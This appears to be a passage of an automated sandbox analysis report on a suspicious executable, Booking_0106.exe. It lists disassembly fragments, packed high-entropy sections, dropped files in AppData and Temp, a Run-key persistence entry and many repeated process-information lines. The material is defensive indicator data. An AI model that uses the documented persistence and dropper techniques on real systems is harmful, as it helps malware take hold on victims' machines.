Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 0_2_05C66822 push ds; retf	0_2_05C66823
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 2_2_02E80C55 push edi; retf	2_2_02E80C7A
Source: C:\Users\user\Desktop\Booking_0106.exe	Code function: 2_2_06BCFAF3 push es; ret	2_2_06BCFAF4
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_02A0C839 push 54052996h; ret	3_2_02A0C845
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_057485BE push ds; retf	3_2_057485BF
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 3_2_05986822 push ds; retf	3_2_05986823
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_00EC0C55 push edi; retf	4_2_00EC0C7A
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_064C5150 push es; ret	4_2_064C5160
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_064CFB44 push es; iretd	4_2_064CFB54
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_064CFB55 push es; iretd	4_2_064CFB5C
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_064CFB6D push es; iretd	4_2_064CFB70
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_064CFB7D push es; iretd	4_2_064CFB88
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_064CFB71 push es; iretd	4_2_064CFB7C
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_064CFB10 push es; iretd	4_2_064CFB24
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_064CFBCD push es; iretd	4_2_064CFBDC
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_064CFBC9 push es; iretd	4_2_064CFBCC
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_064CFBDD push es; iretd	4_2_064CFBE0
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 4_2_064CFB99 push es; iretd	4_2_064CFBC8
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_00F9C839 push 54050B96h; ret	8_2_00F9C845
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_0519B1FA push ss; retf	8_2_0519B200
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_0519C225 push es; retf	8_2_0519C226
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_053685BE push ds; retf	8_2_053685BF
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 8_2_055A6822 push ds; retf	8_2_055A6823
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 9_2_02E70C55 push edi; retf	9_2_02E70C7A
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 9_2_06B9FB95 push es; iretd	9_2_06B9FBCC
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 9_2_06B9FBD5 push es; iretd	9_2_06B9FBDC
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 9_2_06B9FBCD push es; iretd	9_2_06B9FBD4
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 9_2_06B9FB23 push es; iretd	9_2_06B9FB24
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Code function: 9_2_06B9FB10 push es; iretd	9_2_06B9FB20

Source: Booking_0106.exe	Static PE information: section name: .text entropy: 7.388391889899485
Source: ibrzb.exe.0.dr	Static PE information: section name: .text entropy: 7.388391889899485

Source: C:\Users\user\Desktop\Booking_0106.exe	File created: C:\Users\user\AppData\Roaming\ibrzb.exe			Jump to dropped file
Source: C:\Users\user\Desktop\Booking_0106.exe	File created: C:\Users\user\AppData\Local\Temp\doc-d.exe			Jump to dropped file

Source: C:\Users\user\Desktop\Booking_0106.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ibrzb			Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ibrzb			Jump to behavior

Source: C:\Users\user\Desktop\Booking_0106.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior

Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
